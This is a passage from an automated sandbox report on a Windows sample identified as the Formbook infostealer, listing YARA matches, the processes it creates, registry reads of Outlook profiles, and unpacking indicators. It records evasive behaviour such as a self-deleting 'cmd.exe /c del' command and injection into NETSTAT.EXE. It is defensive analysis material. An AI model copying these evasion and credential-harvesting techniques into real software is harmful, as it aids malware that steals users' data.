          Source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/0@14/9
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_0041DDA8 GetLastError,FormatMessageA,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_00408606 GetDiskFreeSpaceA,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_004137F4 FindResourceA,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_01
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: mp0nMsMroT.exeVirustotal: Detection: 47%
          Source: mp0nMsMroT.exeReversingLabs: Detection: 79%
          Source: unknownProcess created: C:\Users\user\Desktop\mp0nMsMroT.exe 'C:\Users\user\Desktop\mp0nMsMroT.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\mp0nMsMroT.exe 'C:\Users\user\Desktop\mp0nMsMroT.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\mp0nMsMroT.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeProcess created: C:\Users\user\Desktop\mp0nMsMroT.exe 'C:\Users\user\Desktop\mp0nMsMroT.exe'
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\mp0nMsMroT.exe'
          Source: C:\Windows\SysWOW64\NETSTAT.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
          Source: C:\Windows\SysWOW64\NETSTAT.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: Binary string: wntdll.pdbUGP source: mp0nMsMroT.exe, 00000001.00000002.232510703.0000000000A90000.00000040.00000001.sdmp, NETSTAT.EXE, 00000005.00000002.451053181.00000000031DF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: mp0nMsMroT.exe, NETSTAT.EXE, 00000005.00000002.451053181.00000000031DF000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeUnpacked PE file: 1.2.mp0nMsMroT.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_004265C8 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_004482AC push 00448339h; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_00416038 push ecx; mov dword ptr [esp], edx
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_0045E088 push 0045E0B4h; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_00448244 push 004482AAh; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_00426224 push 00426250h; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_004263D0 push 004263FCh; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_00436418 push 00436444h; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_00424540 push 0042456Ch; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_0042E57C push 0042E5A8h; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_0042E5CC push 0042E60Fh; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_00436580 push 004365ACh; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_00428608 push 00428661h; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_0042E634 push 0042E677h; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_004306C8 push 0043070Ah; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_004246D8 push 00424704h; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_0042E6F0 push 0042E73Bh; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_0042E698 push 0042E6E4h; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_0042E748 push 0042E774h; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_00410736 push 004107AEh; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_00410738 push 004107AEh; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_004107B0 push 00410858h; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_0041085A push 00410970h; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_0041A8AE push 0041A95Bh; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_0041A8B0 push 0041A95Bh; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_00410944 push 00410970h; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_0041A960 push 0041A9F0h; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_004069D4 push ecx; mov dword ptr [esp], eax
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_0041A9F2 push 0041AD10h; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_00462A60 push 00462A8Ch; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_00460AE4 push 00460B24h; ret
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_00412ABC push ecx; mov dword ptr [esp], edx

          Boot Survival:

          bar